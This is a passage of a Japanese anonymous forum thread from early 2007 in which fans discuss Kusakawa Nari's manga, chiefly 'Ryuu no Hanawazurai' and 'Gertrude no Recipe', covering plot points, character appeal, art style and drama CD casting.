あのレスの「大好きだった婚約者」ってルシンの事だったの? クワンだとばかり思ってた。
あれだけキャーキャー言っててルシンにも迷うのか…みたいな意味かと。
>>144見て初めて思い込みに気付いたよ…


147 :花と名無しさん:2007/01/01(月) 01:39:25 ID:???O
あけおめ
古い話になるんだけどガートルードの一旦死ぬ話の時
サハラを助けなくてもガートルードは死ぬってことでいいの?

148 :花と名無しさん:2007/01/01(月) 16:28:18 ID:???O
スレ住人達よあけおめー
今年も草川さんの漫画がたくさん読めますように

>>147
巻き戻しのとこかな?
あれはサハラが目覚めたら術が発動するから、鍵を挿して起こさない限り
ガートルードの体は崩れなかったんじゃないかな
ガートルードは絶対鍵を挿すと思うから上記の状況になることはまずないと思うけど

149 :花と名無しさん:2007/01/01(月) 16:57:50 ID:???0
あけましておめでd

サイト更新されてるけどTOPには絵出てこないね
おぶさりてーってルシンの心の声なんだろうか

150 :花と名無しさん:2007/01/01(月) 19:16:21 ID:???0
新年早々チラシの裏すまん。
あと批判的だから気分悪くなる人は読まないで。





本スレで前、「婚約者二人って不健康な状況が逆ハーより気分悪い 」
って言ってた人居たけど自分も同じだな。
それにこれ言っちゃおしまいなんだけど、
人の心ってそんな簡単に表せるものじゃないよね。
クワンとキスして花増えたけどキスしないと心が動かないのか?
そんな訳ないよね。日常のふとした何気ない瞬間にときめく方が多いと思う。
だからキスとかで花増えるの見ると相手がクワンでもルシンでもなんかな。
ルシンもクワンも本当にシャクヤに事好きなのか(自分は)疑っちゃうけど、
まずシャクヤが本当にクワンが好きなのか疑っちゃう。
自分から見るとシャクヤって影薄いって言うか何やっても受身に感じる。
だから今回待女達が皆シャクヤ大好きみたいだったのもマンセーを感じる…。
てか、婚約者決まったら花どうなるんだろう…。
もし大接戦で決まったら片腕には違う花が大輪咲いちゃってるのか。
でも決まったらすぐ枯れるのもな。
設定から微妙だったのかもね。

151 : 【末吉】 【750円】 :2007/01/01(月) 20:34:34 ID:???O
キスしたら気分高まって花増えても仕方ない気がするけど。まして初めてなら。
実際そんなもんな気がするしあんまり気にならないけど…

152 :花と名無しさん:2007/01/01(月) 21:03:49 ID:???0
キスしてなくても花5つあったからねえ。

まあ、なんていうか、コミックスまでだと、
クワン好きとか言っときながら気にしてるのは
ルシンのほうじゃん、とか思ってたけど、
最近はクワンクワンだから、シャクヤのクワンを
思う気持ちを疑う事はないかなあ。

153 :花と名無しさん:2007/01/01(月) 21:50:41 ID:???0
刷り込みやつり橋効果はあるだろうけどクワンの事好きだと思う
クワンはほんとにシャクヤを好きか疑ってるけどw
感情なんて曖昧だしこうしたらこうだよねって決め付けるような言い方は
息苦しいなあ

154 :花と名無しさん:2007/01/01(月) 21:59:39 ID:???O
>>148 レスd
でもそこじゃなくてガートルードが自分の体に呪いをかける所
ガートルードが先に死んだからサハラは無事だったわけだけど
あそこでガートルードが呪いをしなければ
サハラ&ガートルード両方が死ぬ結果になってたのかな?
と判らなくなりまして。

155 :花と名無しさん:2007/01/02(火) 11:09:30 ID:???0
TOP絵かわいいなあ。しかしシャクヤやっぱり成長してる。
草川ヒロインでは珍しい…しかも15歳設定…。

156 :花と名無しさん:2007/01/02(火) 17:46:50 ID:???O
>>144
>>145
今更ながら同意。
婚約者だしお互いに仲良くしようという気はあって、
手紙のやり取りしたり会ったりするうちに好感を持ったとは思う。
でも十歳そこらの子供が愛だの恋だのましてや結婚相手だなんてピンと来ない筈だし、
当時はお互い友達に毛が生えたくらいの認識じゃなかったのかなーと。

>>146
自分もどっちだかわかんなかったから安心汁ww

157 :花と名無しさん:2007/01/02(火) 20:04:56 ID:???0
シャクヤは自分でセクシーガール〜♪と唄うだけあってスタイルいいな
セクシーではないけどな

158 :花と名無しさん:2007/01/03(水) 17:26:03 ID:???O
婚約者二人が不健康というか、>>150タンが龍を読んでいる状態の方が不健康だと思うwww

159 :花と名無しさん:2007/01/04(木) 23:55:32 ID:xj/kNf6wO
>>154
スマソそっちだったか
それならガートルードの体は崩れ続けるしサハラの命も削られ続けるから、
多分両方がアボンしてたと思う(自分で書いてて何て救いのない展開だとオモタw)

160 :花と名無しさん:2007/01/05(金) 00:17:39 ID:???O
うわageてた…

161 :花と名無しさん:2007/01/05(金) 00:25:27 ID:???0
ガー好きだったな
基本さわやかだけど仄暗さも見え隠れしてるとこが好き>草川作品
架空亭もぶっちゃければ近親相姦の悲恋の果てに心中目的で造られた物だし
設定だけだと重いよね


162 :花と名無しさん:2007/01/05(金) 03:35:53 ID:???O
>>159d
やっぱ2人共死んじゃう結果もありえたのかー
クロードにしてみたら奇跡の大逆転された感じだなー
皆無事で良かった良かった。

163 :花と名無しさん:2007/01/05(金) 09:30:35 ID:???0
二人の魂を取り出すには、ガーの身体を解体する必要がある。
解体するにはエネルギーが必要。それが漱の命。
クロードは婚約者を取り戻したいのと漱の兄としての気持ちが
あって、そこで葛藤してガーに鍵を渡したんじゃないかと。
勿論、ガーが漱を起こすだろうって計算もあっただろうけどね。

164 :花と名無しさん:2007/01/05(金) 11:08:30 ID:???O
>>155
甘喃あたりまでの草川ヒロインの胸はささやかだったもんなぁ
セロもそのくらいの時季に生まれたヒロインだからか胸は今までで一番ないかも
現担当さん男の人だし、「たまには巨乳ヒロイン描いてみたら?」とか言われてたりして

>>157
>セクシーではないけどな
ワロタwww

165 :花と名無しさん:2007/01/06(土) 23:13:30 ID:???O
ガートルードが読みたくなってきたじゃないかどうしてくれる

166 :花と名無しさん:2007/01/06(土) 23:36:18 ID:???0
ノシ
押入れから5巻をひっぱり出してきた。

167 :花と名無しさん:2007/01/07(日) 18:25:01 ID:???O
>>161
その二つに比べて龍は明るい方かと思いきや、
ルシンは子供の頃大けがして血まみれになって記憶喪失、
クワンは孤児で今の親から満足な愛情を得られず、(欲しがってはないみたいだけど)
最近まで出てた緑陰をおびやかす覆面集団は砂嵐の呪術が失敗して砂で窒息死…

まさに基本さわやかだけど仄暗さが見え隠れって感じだねー。
自分もそこが草川作品の魅力だと思っている。
暗くなりすぎないのは絵柄のせいもあるかな。
水野さんや樋野さんあたりが同じシーン描いたらホラーになりそうww

168 :花と名無しさん:2007/01/07(日) 23:22:47 ID:???0
あの絵柄だとシリアスでもいまいち緊迫感ないかもw
絵もキャラもどこか間が抜けたとこあるからね

>>158
不健康ついでに両方娶れば良いと思う
将来女王になるんだからそのくらい豪気な事やればいい

169 :花と名無しさん:2007/01/07(日) 23:26:46 ID:???0
それは嫌w

170 :花と名無しさん:2007/01/08(月) 09:15:42 ID:???O
ていうか娶るって書くとあの二人のが嫁みたいwww

171 :花と名無しさん:2007/01/09(火) 05:07:51 ID:???O
意味合いではルシンはそれで合ってるようなw

ガーのレシピのカーティスは誰かの喪に服してるって読んだから
読み切りの子かと思いきやその時点で黒ネクタイなんだね

172 :花と名無しさん:2007/01/09(火) 09:10:33 ID:???O
>171
自分も最初そう思ったけど、
あの時代にあの格好はみんな黒ネクタイなんじゃないかな、とか
現在のあの黒いネクタイでなくてもいいスーツで
あえて黒ネクタイを使ってるってのが『喪に服してる』てことなんじゃない
つまり、やっぱりーティスは今でもアンの死を悼んでるといいなって事なんだけど

173 :花と名無しさん:2007/01/09(火) 14:22:31 ID:???0
そもそもアンじゃない誰かの喪に服してるんなら、あの読切を描いた
意味がないじゃないかwアンがカーティスの目の前で死ぬ描写も必要なくなる。

174 :花と名無しさん:2007/01/10(水) 00:11:51 ID:???0
今更ながらガートルードのドラマCD聴いたけど、
これは音声だけで表せる作品じゃないよなと思った
キャラがやたら説明口調で、ことごとく見せ場を潰してる感じ
「壁がしなってるー!?」ってw

175 :花と名無しさん:2007/01/10(水) 01:12:29 ID:???O
草川さん微妙にキャラの長身が高くなってきたよーな。
ガーの後半頃の絵が1番好みだ。

176 :花と名無しさん:2007/01/10(水) 01:31:39 ID:???0
こないだクワンの頭身測ったら9頭身あった男キャラはそれがデフォになってきてる

177 :花と名無しさん:2007/01/10(水) 01:41:38 ID:???0
別の漫画であるキャラが灰化して、その後元に戻れたんだけど灰の大半が風で吹き飛んでて
無くなった分だけ欠けて体が再生された…といネタがあり、ガーの4巻読むと
どうしてもそのシーンがちらついてしまう
シリアス感動シーンが台無しだorz

178 :花と名無しさん:2007/01/10(水) 02:15:20 ID:???O
>>174
そのCDいつか買おういつか買おうと思っていたんだが、買わなくて正解?声は合ってた?

>>177
ちょwおまw深夜に笑かすなwww


179 :花と名無しさん:2007/01/10(水) 03:03:24 ID:???0
>>178
>174じゃないけど個人的にサハラの声はイメージと違ってた
ちょっと声がガサツでもっとクールで可愛い声の人が良かった(好きな人スマソ)
プッペンとマリオットも予想外に親父声だったけどこれはこれで

ドラマCDは3回ぐらいしか聴かなかったけどキャラ紹介のサハラタンのカット絵と紹介文が
萌えたので個人的にはそれで良し
でも3千円は高いなあ…コールマンじゃなくてカーティスの話にして欲しかったかも


180 :花と名無しさん:2007/01/10(水) 12:49:54 ID:???O
>>179d
プペマリが実は高校生くらいの人間に化けれるんですよっていうことをあまり考えてない配役かもね>親父声
普段の姿で若々しすぎる声も微妙だけどw

そのサハラは描き下ろし…だよね?
それ聞いただけで欲しくなってしまう根っからの草川ファンな自分ww

181 :花と名無しさん:2007/01/10(水) 20:53:37 ID:???O
>171アンの事だと思うよ。
柱の各話紹介のところのネクタイ黒じゃないもん。
自分はそれ見てむしろ切ない感じがした(⊃д`)

182 :花と名無しさん:2007/01/10(水) 22:01:47 ID:???0
ヒロインの性格快活なタイプの子が多い気がするので
今度はしっとり系も描いてもらいたい
アンみたいな娘さんも好き


183 :花と名無しさん:2007/01/10(水) 23:08:49 ID:???O
草川ヒロインはみんな男前だからなあw

184 :花と名無しさん:2007/01/11(木) 00:38:02 ID:???O
アンも芯はしっかりした子だったよね
大体はさっぱりあっさり男前行動派に分類される気ガス>草川ヒロイン

シャクヤなんかは龍自体が恋愛メインな話のせいもあるけど、草川ヒロインにしては乙女で珍しいw

185 :花と名無しさん:2007/01/11(木) 17:36:59 ID:???0
シャクヤは恋愛一直線なせいか見てて不安になるなあ…
クワンを好きで仕方ないとこは可愛いとも思うんだけど幼さが不安

186 :花と名無しさん:2007/01/11(木) 19:15:46 ID:???0
そうか?
十五歳くらいだろ?世界の危機時の救世主ならともかく、
まだ龍族の後継者で親が健在中なら
ちゃんと仕事してるし、あれくらいなら別にいいかと。

自分が人の上にたつ身だって自覚はあるみたいだしな。

187 :花と名無しさん:2007/01/11(木) 23:50:50 ID:???O
自分も皆が言うほどシャクヤが駄目な女の子には思えないんだけどなー
だからって草川ヒロインの中でシャクヤが一番好きとかいうのでもないんだけど
確かに歴代ヒロインに比べたら乙女度は高い
まだ物語も中盤に差し掛かったとこくらいな気するし、
これからガンガン強くなってくんじゃないか?


188 :花と名無しさん:2007/01/12(金) 00:14:35 ID:???0
十分だと思うがなぁ

189 :花と名無しさん:2007/01/12(金) 00:39:54 ID:???0
本誌スレで龍の掲載位置が低すぎるって主張するの止めてくれないかな?
痛い儲みたいだよ。実際自分は面白くないと思ってるから掲載位置は妥当だと思う
草川作品はもちろん好きだけどね

190 :花と名無しさん:2007/01/12(金) 00:50:51 ID:???0
別に低すぎるなんて主張はしてないと思うけど…
まあ自分も草川さんに限らず好きな作家はあっちで語って欲しくないけど
気にしすぎなんじゃないのー

191 :花と名無しさん:2007/01/12(金) 00:54:12 ID:???O
>>187
皆が言うほど>そんなに皆言ってたっけ?


完全に自分の主観だが、シャクヤは他の漫画のヒロインで重度の色ボケに陥ってる
人達よりはマシだと思ってた。公務のことを第一に考えてて、クワンクワン
言ってるけどぶどうアーン事件以外にときめいてる場面はギャグ描写がほとんで
(勿論大ケガした時は除く)、クワン自身がたしなめてくれるから気にならなかったし

14回ラストの方で「自分のたわいない小ささだけが腑に落ちる」ってシャクヤの
モノローグもあったことだし、きっとこれから成長するところも描かれていくと思うとwktk

>>185の言いたいこともわかるけどね
クワンが好きすぎて心配するあまり不眠不休になっちゃうのも
幼さというか若さの表れだろうし

192 :花と名無しさん:2007/01/12(金) 01:02:39 ID:???O
>>189
話の流れで出た話題ってだけじゃね。
ここの住人かどうかもわからんし過剰反応しないが吉。

193 :花と名無しさん:2007/01/12(金) 01:18:48 ID:???0
>>189
いや過去3回書いてる人がいて、見るたびにイタタと思う

194 :花と名無しさん:2007/01/12(金) 01:57:05 ID:???0
>>193
そうなのか…。じゃあ次からはこっちで語ってくれるといいね。
>>187
自分も一番好きではないけどシャクヤ可愛い。
好きになってもらう為に努力や自分を磨いてる子だと思うし。
この手の話で天然娘だったら駄目だったと思う。

195 :花と名無しさん:2007/01/12(金) 06:58:58 ID:???O
>193
三回が全部同じやつとはかぎらないがな
つーか本誌スレに書いたほうがいいと思うよ

196 :花と名無しさん:2007/01/12(金) 12:55:15 ID:???O
結構前に本スレで「龍が掲載順低くてホスト部が高いなんて今のララはおかしい」
みたいに書いた人がいて、その人はイタタと思ったが(自分は龍好きだけど普通に考えて
人気はホスト部>龍なのはわかってるし、ホスト部が掲載順高いのも妥当)今回のは
そんな噛付く程のことじゃないと思ったよ。他の漫画にケンカ売ってないしね。

197 :花と名無しさん:2007/01/12(金) 22:06:46 ID:???O
今日は1日ヒマだったからずっと君のこと考えてたよ
(中略)
顔を見ないと落ち着かないし君のことが頭から離れない

すごい甘い言葉だよねぇ…雰囲気至ってフツーだけど
流れ一切読まずに書き込んでみました スマソ

198 :花と名無しさん:2007/01/12(金) 22:21:53 ID:???0
誰の台詞か10秒くらいわかんなかった
先生は今だと面と向かってそんな事言えないだろうな

199 :花と名無しさん:2007/01/12(金) 22:41:41 ID:???O
>>197
誤爆かとww


最初そのセリフ読んだ時から、無表情でサラッと何てこと言うんだコイツ!と思ってたw
当時の本人達にその気ナシだもんなぁ

200 :花と名無しさん:2007/01/12(金) 23:19:44 ID:???O
10秒て強者だな…

抜き出してみるとかなりズキュンとくるセリフだよね
書き込んでる時点でズキュンときたし

201 :花と名無しさん:2007/01/13(土) 13:15:05 ID:???O
龍はルシン記憶復活、パレットはセロ恋愛自覚?でどっちも続きが気になるなー

202 :花と名無しさん:2007/01/13(土) 16:28:14 ID:???O
中略を書くかでえらい違いだな>>197
最初本当に草川作品か!?と疑ったし

203 :花と名無しさん:2007/01/14(日) 21:51:21 ID:???O
>>175
花ゆめで男女共に15頭身越える漫画が二つあるから9頭身くらいなら気にならないw

204 :花と名無しさん:2007/01/15(月) 20:23:13 ID:???0
頭身置いといて龍のメイン3人は顔もスタイルも良い設定なんだろうね

205 :花と名無しさん:2007/01/15(月) 21:02:22 ID:???0
草川さんの絵じゃ顔いいとか悪いとか分からない・・・
シャクヤとルピナ同じ顔だよね
ルシンもかっこいいか…?

206 :花と名無しさん:2007/01/15(月) 21:35:34 ID:???O
シャクヤとルピナは目の形が少し違うとオモ。
草川さんの絵じゃ顔のいい悪いわかんないってのには同意w
それでも昔に比べたら描き分け頑張ってるけどね。

自分の主観は置いといて、ルシンは待女達が騒いでるんだから作中ではイケメン設定なんでしょう。
同じ理由でクワンも。

私的にシャクヤは美少女っていうよりかわいこちゃん止まりかな。
大人になったらお父様かお母様似の美人になると予想。

207 :花と名無しさん:2007/01/15(月) 23:02:13 ID:???0
ルシンのあの前髪がうざったい

208 :花と名無しさん:2007/01/15(月) 23:19:32 ID:???0
ルシンはシャクヤ絡むと弱くなるけどモテるタイプだと思うよ性格良いし

209 :花と名無しさん:2007/01/15(月) 23:45:48 ID:???0
今は完全に「見た目」の話をしているのでは

210 :花と名無しさん:2007/01/16(火) 16:36:10 ID:???O
うん、見た目の話だと思う

ルシンの見た目はチャラいというか、龍花の世界でいう「今風の若者」なんだなと思う
ルピナが一話の風呂上がりルシンを見ていい感じって言ってたしその時点では
どんな性格かわかんないから、かっこいい方なんじゃないかな?

211 :花と名無しさん:2007/01/16(火) 19:23:02 ID:???0
絵で見て分からないのがちょっと哀しいな
ルシンに限らず

212 :花と名無しさん:2007/01/16(火) 20:47:12 ID:???O
クワンとかグエル先生とか、普通にカッコイイと思うのは自分だけなのか…

213 :花と名無しさん:2007/01/16(火) 20:59:09 ID:???0
>211
そうなんだけどその通りなんだけどあのファニーフェイス?な絵が愛嬌あって
好きなんだ…
>212
グエル先生は私の中じゃ2.5枚目w
クワンは色気あるというかカコイイオーラが出てると思う

214 :花と名無しさん:2007/01/16(火) 23:54:27 ID:???O
カコイイオーラワロタwww

215 :花と名無しさん:2007/01/17(水) 04:15:33 ID:???O
2.5枚目ってわかるかも。顔立ち自体は端正で美形なんじゃないかと思う。絵見る限り
北国出身なので島民と顔違ったり日焼けしやすかったりしそう。

216 :花と名無しさん:2007/01/17(水) 16:52:30 ID:???0
同じ無表情美形でもオーラで違うのか。

217 :花と名無しさん:2007/01/17(水) 17:42:01 ID:???O
オーラ云々は置いといて、グエル先生は見た目はかっこいいけどあの中身のせいか
2.5枚目になってるってのはあると思うw

そもそも草川先生って作中で美形って単語使わないよね(特級の夜半に
「なかなかに見目もよく〜」とかパピヨンのシャルロに上玉とかは書いてたけど)
予告のアオリ(これも担当さんが考えてるのかな?)見るとウーや夜半や笹舟に
美形だの美少女だのって形容詞使ってるけど、草川さん自身が作中で使ったこと
一度もない気ガス(勘違いだったらスマソ)


218 :花と名無しさん:2007/01/17(水) 22:26:26 ID:???0
その手のアオリ見ると萎えてくるよ…ダジャレより萎える
グエル先生は恋してるせいか悩ましげですな
クワンは大人のフェロモン出てるつかエロい…
ルシンは10年後だとクワンより成熟して格好良くなってるよとフォロー

219 :花と名無しさん:2007/01/18(木) 00:26:10 ID:???O
大人のフェロモンでエロいといえばカーティスを思い出した
ルシンはちょうど十年後に今のクワンの歳になるね

ビスコさんや樋野さんなんかのキャラには使っててもおかしく感じないけど、
草川作品には良くも悪くも「美形」って形容詞似合わないから作中で使われてなくて
良かったかも(草川作品は勿論ホスト部・ヴァンパイアもそれなりに好きなので
どれをけなしているという訳ではなく主観の話です)

220 :花と名無しさん:2007/01/18(木) 23:47:04 ID:???O
>>215
そういやグエル先生は島の外から来たんだったね。
てことはオパルの人達から見たら先生は外国人?

221 :花と名無しさん:2007/01/19(金) 00:10:12 ID:???0
過去の回想シーン見てロシア系と推測。

222 :花と名無しさん:2007/01/19(金) 20:16:08 ID:???0
北欧系かな、と思ってる。

223 :花と名無しさん:2007/01/19(金) 23:57:47 ID:???0
道産子じゃないのか?

224 :花と名無しさん:2007/01/19(金) 23:58:13 ID:???O
クワンは整ってるって表現がしっくりくりな
それにしてもクワンエロい雰囲気かもしだしてるな

225 :花と名無しさん:2007/01/20(土) 06:12:17 ID:???O
ガートルードのレシピに出てきたカーティスの好きな人(かな?)の髪型がすごい好きで一時期真似しようとしましたw
顔が整ってないと難しいかな〜と挫折しましたがwww

(名前はアンでよかったっけ?実家に置いてきたので忘れてしまった)

草川さんの漫画にでてくる女の子の髪型すごい好き。
普通にある髪型なんだろうけどなんかいいなーと思ってしまう

226 :花と名無しさん:2007/01/20(土) 11:22:09 ID:???0
先生の道産子弁はあやしい…

227 :花と名無しさん:2007/01/20(土) 14:36:25 ID:???O
>>225
アンであってるよ
自分は甘喃の髪型が好きだなー
浴衣や着物によく合うアレンジだよねあれ

>>226
やっぱり本当の道民さんからしたら不自然なもの?
槻宮さんとかの監修みたいだけど

228 :花と名無しさん:2007/01/20(土) 16:27:44 ID:???0
>>227
いえ、活字になると不自然に感じるなあ…と思った程度
ありったけの北海道弁つぎこんだ感じでw
龍も書き下ろし楽しみ

229 :花と名無しさん:2007/01/21(日) 16:35:51 ID:???0
>>225チェルシーアン
>>226-227自分も道民ですが、あれはやりすぎw

230 :花と名無しさん:2007/01/21(日) 16:56:59 ID:???0
そこまでしないと標準語地域の人間にはわかりにくいという・・・
まあ、わざとじゃないかと思ってるけどね。
道産子が聞いたらわらえるくらい、って感じで。

231 :花と名無しさん:2007/01/22(月) 15:05:44 ID:???O
>>230
だね。

232 :花と名無しさん:2007/01/22(月) 15:10:48 ID:???O
>>230
そうだと思う
あのオマケ漫画はギャグなんだし誇張してたってことで

もうすぐララ発売だね
予告カットしか載らないけど草川分が不足してるからそれだけでも嬉しいww

233 :花と名無しさん:2007/01/22(月) 15:13:04 ID:???O
スマソ被った

234 :花と名無しさん:2007/01/23(火) 01:38:03 ID:???0
おおお…今月は休みか…ルシンが気になるのに

235 :花と名無しさん:2007/01/23(火) 17:09:15 ID:???0
ララスレ覗いたんだが、再開する号に付く
ふろくのドラマCDのメンバーに龍が入ってるみたい

236 :花と名無しさん:2007/01/23(火) 20:04:00 ID:???0
そんなに興味ないけどここでの話の種にはなるね

237 :花と名無しさん:2007/01/23(火) 23:43:25 ID:???0
・「龍の花わずらい」
シャクヤ:中原麻衣
ルシン:杉山紀彰
クワン:遊佐浩二

コピペだけどキャスト
シャクヤの声優さんしか知らん。確かひぐらしレナだったな。

238 :花と名無しさん:2007/01/24(水) 00:13:56 ID:???O
自分は遊佐さんしか知らなかったけど三人ともわりと売れてる声優さんだよね?
ララスレでルシン役の人がナルトのサスケって聞いて「ああ、あの声ね」ってわかったけど

ドラマCD自体は正直興味薄いんだけど、メンバーに選ばれたことは嬉しいな

239 :花と名無しさん:2007/01/24(水) 00:18:50 ID:???0
ドラマCDの付録って漫画読むのには邪魔くさいしね
龍の台詞は恥ずかしそうだ…

240 :花と名無しさん:2007/01/24(水) 00:58:25 ID:???O
龍に限らず少女漫画のセリフは大体恥ずかしいと思うぞww

ルシンはタラシ系キャラで言動もそうだけど、実はクワンもかなり甘いセリフ言ってるよね

241 :花と名無しさん:2007/01/24(水) 04:27:05 ID:???O
>>197が抜き出したようなことすれば甘いセリフ結構出そうだが…
どうなんだろう

242 :花と名無しさん:2007/01/24(水) 05:48:10 ID:???O
三人共名前は知ってるが、声が思い浮かぶのは杉山さんだけだ。
しかもそれだって某ラノベ原作の赤毛眼鏡でしか知らんのだが。

確かコルダのキャストにも居た気はするな。

243 :花と名無しさん:2007/01/24(水) 09:30:42 ID:???O
>239
切り取れば全く問題ない
立ち読みの人なら邪魔かもしれないけどw

244 :花と名無しさん:2007/01/24(水) 17:31:51 ID:???0
パレット4巻3月発売だとよ。前も連続発売だったよね。



245 :花と名無しさん:2007/01/24(水) 18:05:31 ID:???O
マジでか!
こりゃ来月以降は草川さん不足を一気に解消できそうだw

246 :花と名無しさん:2007/01/24(水) 23:29:12 ID:???0
>>242
コルダに居るのは杉山紀彰ではなく谷山紀章ではなかったかな。


57 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)